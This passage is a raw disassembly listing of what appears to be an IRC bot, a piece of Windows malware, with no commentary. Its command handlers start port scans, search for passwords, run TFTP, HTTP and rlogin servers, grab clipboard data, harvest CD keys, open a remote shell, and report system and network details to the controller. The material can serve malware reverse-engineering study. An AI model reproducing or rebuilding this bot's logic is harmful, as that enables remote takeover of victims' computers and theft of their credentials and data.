or [ebp+var_314], 0FFFFFFFFh
cmp dword_436158, ebx
mov [ebp+var_318], 0A0h
mov [ebp+var_32C], 5
mov [ebp+var_328], ebx
mov [ebp+arg_0], ebx
jz short loc_4114CC
mov eax, [ebp+arg_18]
mov edi, offset dword_436158
lea esi, [eax-0Ah]
loc_411496: ; CODE XREF: sub_40C50A+4FA4�j
lea eax, [edi-28h]
push esi
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_4114B2
inc [ebp+arg_0]
add edi, 3Ch
cmp [edi], ebx
jnz short loc_411496
jmp short loc_4114CC
; ---------------------------------------------------------------------------
loc_4114B2: ; CODE XREF: sub_40C50A+4F9A�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_314], eax
imul ecx, 3Ch
mov ecx, dword_436158[ecx]
mov [ebp+var_330], ecx
loc_4114CC: ; CODE XREF: sub_40C50A+4F7F�j
; sub_40C50A+4FA6�j
cmp [ebp+var_330], ebx
jz loc_4116D5
push 10h
lea eax, [ebp+arg_10]
pop esi
push eax
lea eax, [ebp+var_2EC]
push eax
mov [ebp+arg_10], esi
push [ebp+arg_4]
call dword_44B664 ; getsockname
mov al, [ebp+var_9C7]
push esi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2E8], eax
push [ebp+var_2E8]
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_444]
push eax
call sub_4191A0
xor eax, eax
cmp [ebp+var_9C7], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_444]
push eax
call sub_419170
add esp, 14h
cmp edi, ebx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_41156E
loc_41154C: ; CODE XREF: sub_40C50A+5062�j
cmp eax, ebx
jz short loc_41156E
mov byte ptr [eax], 78h
lea eax, [ebp+var_444]
push 30h
push eax
call sub_419170
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_41154C
loc_41156E: ; CODE XREF: sub_40C50A+5040�j
; sub_40C50A+5044�j
mov eax, [ebp+arg_4]
push [ebp+var_8C]
mov esi, [ebp+var_4]
mov [ebp+var_334], eax
mov eax, [ebp+var_8]
mov edi, 80h
mov [ebp+var_308], eax
lea eax, [ebp+var_434]
push edi
push eax
mov [ebp+var_304], 1
mov [ebp+var_30C], esi
call sub_418EF0
push offset dword_491D80
push offset aFf_1 ; "#ff-"
call sub_419360
add esp, 14h
test eax, eax
jz short loc_4115D8
push offset aFf_1 ; "#ff-"
lea eax, [ebp+var_3B4]
push edi
push eax
call sub_418EF0
add esp, 0Ch
jmp short loc_4115DE
; ---------------------------------------------------------------------------
loc_4115D8: ; CODE XREF: sub_40C50A+50B5�j
mov [ebp+var_3B4], bl
loc_4115DE: ; CODE XREF: sub_40C50A+50CC�j
cmp [ebp+var_304], ebx
mov eax, offset aRandom_1 ; "Random"
jnz short loc_4115F0
mov eax, offset aSequential_0 ; "Sequential"
loc_4115F0: ; CODE XREF: sub_40C50A+50DF�j
push [ebp+var_318]
lea ecx, [ebp+var_444]
push [ebp+var_328]
push [ebp+var_32C]
push [ebp+var_330]
push ecx
push eax
lea eax, [ebp+var_2DC]
push offset aScanSPortSca_0 ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_4161EB
add esp, 2Ch
mov [ebp+var_324], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_444]
push ebx
push eax
push offset sub_40328A
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_324]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_41167A
loc_411668: ; CODE XREF: sub_40C50A+516E�j
cmp [ebp+var_300], ebx
jnz short loc_411695
push 32h
call ds:dword_4942D8
jmp short loc_411668
; ---------------------------------------------------------------------------
loc_41167A: ; CODE XREF: sub_40C50A+515C�j
call ds:dword_4942F0
push eax
lea eax, [ebp+var_2DC]
push offset aScanFailedTo_4 ; "[SCAN]: Failed to start scan thread, er"...
push eax
call sub_418D70
add esp, 0Ch
loc_411695: ; CODE XREF: sub_40C50A+5164�j
cmp [ebp+var_8], ebx
jnz short loc_4116B4
push ebx
lea eax, [ebp+var_2DC]
push esi
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 14h
loc_4116B4: ; CODE XREF: sub_40C50A+518E�j
lea eax, [ebp+var_2DC]
push eax
call sub_4035E1
pop ecx
loc_4116C1: ; CODE XREF: sub_40C50A+4F50�j
add [ebp+arg_18], 0Bh
mov eax, [ebp+arg_18]
cmp [eax], bl
jnz loc_411410
jmp loc_40C97C
; ---------------------------------------------------------------------------
loc_4116D5: ; CODE XREF: sub_40C50A+4FC8�j
push offset aScanFailedTo_5 ; "[SCAN]: Failed to start scan, port is i"...
jmp loc_411C97
; ---------------------------------------------------------------------------
loc_4116DF: ; CODE XREF: sub_40C50A+17E2�j
; sub_40C50A+17F7�j
push [ebp+var_8C]
lea eax, [ebp+var_A4]
push 80h
push eax
call sub_418EF0
mov eax, [ebp+arg_4]
push offset aFindpassSearch ; "[FINDPASS]: Searching for password."
mov [ebp+var_A8], eax
mov eax, [ebp+var_4]
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_418EF0
push ebx
lea eax, [ebp+var_2DC]
push 1Dh
push eax
call sub_4161EB
add esp, 24h
mov [ebp+var_24], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A8]
push ebx
push eax
push offset sub_405C86
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_24]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_411775
loc_411762: ; CODE XREF: sub_40C50A+5269�j
cmp [ebp+var_18], ebx
jnz loc_40EFB5
push 32h
call ds:dword_4942D8
jmp short loc_411762
; ---------------------------------------------------------------------------
loc_411775: ; CODE XREF: sub_40C50A+5256�j
call ds:dword_4942F0
push eax
push offset aFindpassFail_0 ; "[FINDPASS]: Failed to start search thre"...
jmp loc_4124D0
; ---------------------------------------------------------------------------
loc_411786: ; CODE XREF: sub_40C50A+1752�j
; sub_40C50A+1767�j
push 4
call sub_416433
test eax, eax
pop ecx
jle short loc_41179C
push offset aTftpAlreadyRun ; "[TFTP]: Already running."
jmp loc_40E361
; ---------------------------------------------------------------------------
loc_41179C: ; CODE XREF: sub_40C50A+5286�j
mov eax, [ebp+esi+var_90]
cmp eax, ebx
jz short loc_4117BF
push eax
mov edi, 104h
lea eax, [ebp+var_7FC]
push edi
push eax
call sub_418EF0
add esp, 0Ch
jmp short loc_4117D3
; ---------------------------------------------------------------------------
loc_4117BF: ; CODE XREF: sub_40C50A+529B�j
mov edi, 104h
lea eax, [ebp+var_7FC]
push edi
push eax
push ebx
call ds:dword_4942F8
loc_4117D3: ; CODE XREF: sub_40C50A+52B3�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jnz short loc_4117E3
mov esi, offset aAmngesiyko_exe ; "amngesiyko.exe"
loc_4117E3: ; CODE XREF: sub_40C50A+52D2�j
push esi
lea eax, [ebp+var_6F8]
push edi
push eax
call sub_418EF0
mov eax, dword_43E1A0
push 7Fh
push [ebp+var_8C]
mov [ebp+var_5EC], eax
mov eax, [ebp+arg_4]
mov [ebp+var_5F0], ebx
mov [ebp+var_800], eax
lea eax, [ebp+var_5E8]
push eax
call sub_4191A0
mov eax, [ebp+var_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_6F8]
push eax
lea eax, [ebp+var_7FC]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_5EC]
push offset aTftpServerSt_0 ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 4
push eax
call sub_4161EB
add esp, 38h
mov [ebp+var_5F4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_800]
push ebx
push eax
push offset sub_415CF4
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_5F4]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_4118B3
loc_41189D: ; CODE XREF: sub_40C50A+53A7�j
cmp [ebp+var_560], ebx
jnz loc_4125A2
push 32h
call ds:dword_4942D8
jmp short loc_41189D
; ---------------------------------------------------------------------------
loc_4118B3: ; CODE XREF: sub_40C50A+5391�j
call ds:dword_4942F0
push eax
push offset aTftpFailedTo_0 ; "[TFTP]: Failed to start server thread, "...
jmp loc_412593
; ---------------------------------------------------------------------------
loc_4118C4: ; CODE XREF: sub_40C50A+1728�j
; sub_40C50A+173D�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_4118E3
push edi
call sub_4195F0
test eax, eax
pop ecx
jz short loc_4118E3
push edi
call sub_4195F0
pop ecx
jmp short loc_4118E8
; ---------------------------------------------------------------------------
loc_4118E3: ; CODE XREF: sub_40C50A+53C3�j
; sub_40C50A+53CE�j
mov eax, dword_43E1A4
loc_4118E8: ; CODE XREF: sub_40C50A+53D7�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_57C], eax
xor eax, eax
cmp [ebp+var_9C4], bl
setz al
cmp esi, ebx
mov [ebp+var_568], eax
jz short loc_41191B
lea eax, [ebp+var_680]
push esi
push eax
call sub_418D70
pop ecx
pop ecx
jmp short loc_411946
; ---------------------------------------------------------------------------
loc_41191B: ; CODE XREF: sub_40C50A+53FE�j
lea eax, [ebp+var_3FC]
push 104h
push eax
call ds:dword_494320
push ebx
push ebx
lea eax, [ebp+var_2E8]
push ebx
push eax
lea eax, [ebp+var_3FC]
push eax
call sub_41B4D0
add esp, 14h
loc_411946: ; CODE XREF: sub_40C50A+540F�j
lea eax, [ebp+var_680]
push eax
call sub_418E70
cmp [ebp+eax+var_681], 5Ch
pop ecx
jnz short loc_411971
lea eax, [ebp+var_680]
push eax
call sub_418E70
pop ecx
mov [ebp+eax+var_681], bl
loc_411971: ; CODE XREF: sub_40C50A+5451�j
push [ebp+var_8C]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_908]
mov [ebp+var_90C], esi
push 80h
push eax
call sub_418EF0
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_680]
mov [ebp+var_570], edi
push eax
push [ebp+var_57C]
push esi
call sub_40AFEC
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset aHttpdServerL_0 ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 3
push eax
call sub_4161EB
add esp, 20h
mov [ebp+var_574], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_90C]
push ebx
push eax
push offset sub_406D34
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_574]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_411A29
loc_411A13: ; CODE XREF: sub_40C50A+551D�j
cmp [ebp+var_560], ebx
jnz loc_411B78
push 32h
call ds:dword_4942D8
jmp short loc_411A13
; ---------------------------------------------------------------------------
loc_411A29: ; CODE XREF: sub_40C50A+5507�j
call ds:dword_4942F0
push eax
push offset aHttpdFailedT_1 ; "[HTTPD]: Failed to start server thread,"...
jmp loc_411B69
; ---------------------------------------------------------------------------
loc_411A3A: ; CODE XREF: sub_40C50A+16FE�j
; sub_40C50A+1713�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_411A59
push edi
call sub_4195F0
test eax, eax
pop ecx
jz short loc_411A59
push edi
call sub_4195F0
pop ecx
jmp short loc_411A5E
; ---------------------------------------------------------------------------
loc_411A59: ; CODE XREF: sub_40C50A+5539�j
; sub_40C50A+5544�j
mov eax, dword_43E1A8
loc_411A5E: ; CODE XREF: sub_40C50A+554D�j
mov [ebp+var_578], eax
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
jnz short loc_411A75
lea eax, [ebp+var_D4]
loc_411A75: ; CODE XREF: sub_40C50A+5563�j
push eax
lea eax, [ebp+var_6B8]
push 40h
push eax
call sub_418EF0
mov esi, [ebp+esi+var_88]
add esp, 0Ch
cmp esi, ebx
jnz short loc_411A97
mov esi, offset dword_491D7C
loc_411A97: ; CODE XREF: sub_40C50A+5586�j
push esi
lea eax, [ebp+var_678]
push 100h
push eax
call sub_418EF0
push [ebp+var_8C]
lea eax, [ebp+var_738]
push 80h
push eax
call sub_418EF0
mov eax, [ebp+var_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
add esp, 18h
mov [ebp+var_564], eax
lea eax, [ebp+var_6B8]
push eax
mov [ebp+var_73C], esi
push [ebp+var_578]
mov [ebp+var_568], edi
push esi
call sub_40AFEC
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset aRlogindServerL ; "[RLOGIND]: Server listening on IP: %s:%"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 6
push eax
call sub_4161EB
add esp, 20h
mov [ebp+var_574], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_73C]
push ebx
push eax
push offset sub_4132AA
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_574]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_411B5D
loc_411B4B: ; CODE XREF: sub_40C50A+5651�j
cmp [ebp+var_560], ebx
jnz short loc_411B78
push 32h
call ds:dword_4942D8
jmp short loc_411B4B
; ---------------------------------------------------------------------------
loc_411B5D: ; CODE XREF: sub_40C50A+563F�j
call ds:dword_4942F0
push eax
push offset aRlogindFailedT ; "[RLOGIND]: Failed to start server threa"...
loc_411B69: ; CODE XREF: sub_40C50A+3632�j
; sub_40C50A+372C�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 0Ch
loc_411B78: ; CODE XREF: sub_40C50A+3616�j
; sub_40C50A+3710�j ...
cmp [ebp+var_8], ebx
jnz loc_40EFB5
push ebx
push edi
loc_411B83: ; CODE XREF: sub_40C50A+2ED6�j
lea eax, [ebp+var_2DC]
push eax
push [ebp+var_8C]
push esi
jmp loc_40EFAD
; ---------------------------------------------------------------------------
loc_411B96: ; CODE XREF: sub_40C50A+16D4�j
; sub_40C50A+16E9�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_411BA9
push esi
call sub_4195F0
jmp short loc_411BB0
; ---------------------------------------------------------------------------
loc_411BA9: ; CODE XREF: sub_40C50A+5695�j
push 8
call sub_416452
loc_411BB0: ; CODE XREF: sub_40C50A+569D�j
cmp eax, ebx
pop ecx
jz loc_41263B
push eax
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40291D
loc_411BCB: ; CODE XREF: sub_40C50A+5B5B�j
add esp, 10h
jmp loc_41263B
; ---------------------------------------------------------------------------
loc_411BD3: ; CODE XREF: sub_40C50A+16AA�j
; sub_40C50A+16BF�j
mov eax, dword_44B5E8
cmp eax, ebx
jz short loc_411BF0
call eax ; DnsFlushResolverCache
test eax, eax
jz short loc_411BE9
push offset aFlushdnsDnsCac ; "[FLUSHDNS]: DNS cache flushed."
jmp short loc_411C05
; ---------------------------------------------------------------------------
loc_411BE9: ; CODE XREF: sub_40C50A+56D6�j
push offset aFlushdnsFailed ; "[FLUSHDNS]: Failed to flush DNS cache."
jmp short loc_411C05
; ---------------------------------------------------------------------------
loc_411BF0: ; CODE XREF: sub_40C50A+56D0�j
push offset aFlushdnsFail_0 ; "[FLUSHDNS]: Failed to load dnsapi.dll."
jmp short loc_411C05
; ---------------------------------------------------------------------------
loc_411BF7: ; CODE XREF: sub_40C50A+1680�j
; sub_40C50A+1695�j
call sub_40AF08
test eax, eax
jz short loc_411C1B
push offset aFlushdnsArpC_0 ; "[FLUSHDNS]: ARP cache flushed."
loc_411C05: ; CODE XREF: sub_40C50A+56DD�j
; sub_40C50A+56E4�j ...
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_418EF0
jmp loc_4124FA
; ---------------------------------------------------------------------------
loc_411C1B: ; CODE XREF: sub_40C50A+56F4�j
push offset aFlushdnsFail_1 ; "[FLUSHDNS]: Failed to flush ARP cache."
jmp short loc_411C05
; ---------------------------------------------------------------------------
loc_411C22: ; CODE XREF: sub_40C50A+1656�j
; sub_40C50A+166B�j
cmp [ebp+var_8], ebx
jnz short loc_411C41
push ebx
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 14h
loc_411C41: ; CODE XREF: sub_40C50A+571B�j
push ebx
push [ebp+var_4]
call sub_409B2A
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
push offset aMainGetClipboa ; "[MAIN]: Get Clipboard."
jmp loc_411F34
; ---------------------------------------------------------------------------
loc_411C63: ; CODE XREF: sub_40C50A+1576�j
; sub_40C50A+158B�j
push 7
call sub_416433
test eax, eax
pop ecx
jle short loc_411C76
push offset aCmdRemoteShell ; "[CMD]: Remote shell already running."
jmp short loc_411C97
; ---------------------------------------------------------------------------
loc_411C76: ; CODE XREF: sub_40C50A+5763�j
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412E64
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_411C92
push offset aCmdCouldnTOpen ; "[CMD]: Couldn't open remote shell."
jmp short loc_411C97
; ---------------------------------------------------------------------------
loc_411C92: ; CODE XREF: sub_40C50A+577F�j
push offset aCmdRemoteShe_0 ; "[CMD]: Remote shell ready."
loc_411C97: ; CODE XREF: sub_40C50A+2C73�j
; sub_40C50A+2DA3�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
pop ecx
pop ecx
jmp loc_40EF94
; ---------------------------------------------------------------------------
loc_411CAA: ; CODE XREF: sub_40C50A+154C�j
; sub_40C50A+1561�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_409517
jmp loc_411F52
; ---------------------------------------------------------------------------
loc_411CC3: ; CODE XREF: sub_40C50A+1522�j
; sub_40C50A+1537�j
push [ebp+esi+var_90]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_4058B3
jmp loc_411F52
; ---------------------------------------------------------------------------
loc_411CE0: ; CODE XREF: sub_40C50A+14F8�j
; sub_40C50A+150D�j
or edi, 0FFFFFFFFh
call ds:dword_494308
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, [ebp+esi+var_90]
cmp esi, ebx
mov [ebp+arg_0], eax
jz short loc_411D09
push esi
call sub_4195F0
pop ecx
mov edi, eax
loc_411D09: ; CODE XREF: sub_40C50A+57F4�j
mov eax, [ebp+arg_0]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_411D22
cmp edi, 0FFFFFFFFh
jnz loc_41263B
loc_411D22: ; CODE XREF: sub_40C50A+580D�j
push ebx
call sub_415273
push eax
lea eax, [ebp+var_2DC]
push offset aMainUptimeS_ ; "[MAIN]: Uptime: %s."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
lea eax, [ebp+var_2DC]
push eax
call sub_4035E1
jmp loc_40F971
; ---------------------------------------------------------------------------
loc_411D64: ; CODE XREF: sub_40C50A+14CE�j
; sub_40C50A+14E3�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_403FBB
lea eax, [ebp+var_2DC]
push offset aCdkeysSearchCo ; "[CDKEYS]: Search completed."
push eax
call sub_418D70
add esp, 14h
jmp loc_4125A2
; ---------------------------------------------------------------------------
loc_411D8E: ; CODE XREF: sub_40C50A+14A4�j
; sub_40C50A+14B9�j
push 1Eh
call sub_416433
test eax, eax
pop ecx
jle short loc_411DC2
cmp [ebp+var_8], ebx
jnz loc_40C97C
push ebx
push [ebp+var_4]
push offset aProcAlreadyRun ; "[PROC]: Already running."
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 14h
jmp loc_40C97C
; ---------------------------------------------------------------------------
loc_411DC2: ; CODE XREF: sub_40C50A+588E�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_418EF0
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_90]
mov [ebp+var_4F4], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_464], eax
mov [ebp+var_46C], ebx
jz short loc_411E23
push esi
push offset aFull ; "full"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_411E23
mov [ebp+var_46C], 1
loc_411E23: ; CODE XREF: sub_40C50A+58FC�j
; sub_40C50A+590D�j
lea eax, [ebp+var_2DC]
push offset aProcsProccessL ; "[PROCS]: Proccess list."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 1Eh
push eax
call sub_4161EB
add esp, 14h
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_40B735
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_411E91
loc_411E7B: ; CODE XREF: sub_40C50A+5985�j
cmp [ebp+var_460], ebx
jnz loc_40EFB5
push 32h
call ds:dword_4942D8
jmp short loc_411E7B
; ---------------------------------------------------------------------------
loc_411E91: ; CODE XREF: sub_40C50A+596F�j
call ds:dword_4942F0
push eax
push offset aProcsFailedT_0 ; "[PROCS]: Failed to start listing thread"...
jmp loc_4124D0
; ---------------------------------------------------------------------------
loc_411EA2: ; CODE XREF: sub_40C50A+147A�j
; sub_40C50A+148F�j
cmp [ebp+var_8], ebx
jnz short loc_411EC1
push ebx
push [ebp+var_4]
push offset aMainRemovingBo ; "[MAIN]: Removing Bot."
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 14h
loc_411EC1: ; CODE XREF: sub_40C50A+599B�j
push [ebp+arg_4]
call dword_44B758 ; closesocket
call dword_44B620 ; WSACleanup
call sub_409D2E
push ebx
call ds:dword_49432C
loc_411EDC: ; CODE XREF: sub_40C50A+1450�j
; sub_40C50A+1465�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push [ebp+arg_4]
push eax
call sub_415430
pop ecx
pop ecx
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
push offset aMainSystemInfo ; "[MAIN]: System Info."
jmp short loc_411F34
; ---------------------------------------------------------------------------
loc_411F07: ; CODE XREF: sub_40C50A+1426�j
; sub_40C50A+143B�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_4156E4
add esp, 0Ch
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
push offset aMainNetworkInf ; "[MAIN]: Network Info."
loc_411F34: ; CODE XREF: sub_40C50A+5754�j
; sub_40C50A+59FB�j
call sub_4035E1
jmp loc_41073E
; ---------------------------------------------------------------------------
loc_411F3E: ; CODE XREF: sub_40C50A+13FC�j
; sub_40C50A+1411�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40371E
loc_411F52: ; CODE XREF: sub_40C50A+3BC�j
; sub_40C50A+57B4�j ...
add esp, 10h
jmp loc_40C97C
; ---------------------------------------------------------------------------
loc_411F5A: ; CODE XREF: sub_40C50A+13D2�j
; sub_40C50A+13E7�j
cmp [ebp+var_C], ebx
mov [ebp+var_388], bl
jz short loc_411F99
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_411F99
push esi
push [ebp+var_C]
call sub_419AB0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_411F99
push eax
push offset aS_36 ; "%s"
lea eax, [ebp+var_388]
push 80h
push eax
call sub_418EF0
add esp, 10h
loc_411F99: ; CODE XREF: sub_40C50A+5A59�j
; sub_40C50A+5A64�j ...
push [ebp+var_8C]
lea eax, [ebp+var_408]
push 80h
push eax
call sub_418EF0
mov eax, [ebp+arg_4]
push offset aLogListingLog_ ; "[LOG]: Listing log."
mov [ebp+var_40C], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
mov eax, [ebp+var_8]
mov [ebp+var_300], eax
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 1Ch
push eax
call sub_4161EB
add esp, 20h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_40C]
push ebx
push eax
push offset sub_403791
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_412039
loc_412023: ; CODE XREF: sub_40C50A+5B2D�j
cmp [ebp+var_2FC], ebx
jnz loc_40C97C
push 32h
call ds:dword_4942D8
jmp short loc_412023
; ---------------------------------------------------------------------------
loc_412039: ; CODE XREF: sub_40C50A+5B17�j
call ds:dword_4942F0
push eax
push offset aLogFailedToSta ; "[LOG]: Failed to start listing thread, "...
jmp loc_4127C2
; ---------------------------------------------------------------------------
loc_41204A: ; CODE XREF: sub_40C50A+13A8�j
; sub_40C50A+13BD�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_403569
push offset aMainAliasList_ ; "[MAIN]: Alias list."
call sub_4035E1
jmp loc_411BCB
; ---------------------------------------------------------------------------
loc_41206A: ; CODE XREF: sub_40C50A+137E�j
; sub_40C50A+1393�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_418EF0
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_90]
mov [ebp+var_4F4], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_464], eax
jz short loc_4120C4
push offset aSub ; "sub"
push esi
call sub_419360
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_46C], eax
jmp short loc_4120CA
; ---------------------------------------------------------------------------
loc_4120C4: ; CODE XREF: sub_40C50A+5B9E�j
mov [ebp+var_46C], ebx
loc_4120CA: ; CODE XREF: sub_40C50A+5BB8�j
lea eax, [ebp+var_2DC]
push offset aThreadsListThr ; "[THREADS]: List threads."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 1Fh
push eax
call sub_4161EB
add esp, 14h
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_416256
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_412134
loc_412122: ; CODE XREF: sub_40C50A+5C28�j
cmp [ebp+var_460], ebx
jnz short loc_41214F
push 32h
call ds:dword_4942D8
jmp short loc_412122
; ---------------------------------------------------------------------------
loc_412134: ; CODE XREF: sub_40C50A+5C16�j
call ds:dword_4942F0
push eax
push offset aThreadsFaile_0 ; "[THREADS]: Failed to start list thread,"...
loc_412140: ; CODE XREF: sub_40C50A+48BA�j
; sub_40C50A+49D3�j
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 0Ch
loc_41214F: ; CODE XREF: sub_40C50A+4548�j
; sub_40C50A+4560�j ...
lea eax, [ebp+var_2DC]
push eax
jmp loc_40DB46
; ---------------------------------------------------------------------------
loc_41215B: ; CODE XREF: sub_40C50A+1302�j
; sub_40C50A+1317�j
push offset aFenr ; "FEnR"
lea eax, [ebp+var_2DC]
push offset aMainBotIdS_ ; "[MAIN]: Bot ID: %s."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 20h
jmp loc_40E781
; ---------------------------------------------------------------------------
loc_412192: ; CODE XREF: sub_40C50A+12D8�j
; sub_40C50A+12ED�j
push dword_491BE8
call sub_415273
push eax
lea eax, [ebp+var_2DC]
push offset aMainStatusRead ; "[MAIN]: Status: Ready. Bot Uptime: %s."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 24h
jmp loc_40E781
; ---------------------------------------------------------------------------
loc_4121D0: ; CODE XREF: sub_40C50A+12AE�j
; sub_40C50A+12C3�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_412202
cmp [ebp+var_C], ebx
jz short loc_412211
push esi
push [ebp+var_C]
call sub_419AB0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_412211
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_4083E7
add esp, 0Ch
jmp short loc_412211
; ---------------------------------------------------------------------------
loc_412202: ; CODE XREF: sub_40C50A+5CCF�j
push offset aQuitLater_0 ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_4083E7
pop ecx
pop ecx
loc_412211: ; CODE XREF: sub_40C50A+5CD4�j
; sub_40C50A+5CE3�j ...
push 0FFFFFFFEh
jmp loc_40C97E
; ---------------------------------------------------------------------------
loc_412218: ; CODE XREF: sub_40C50A+1284�j
; sub_40C50A+1299�j
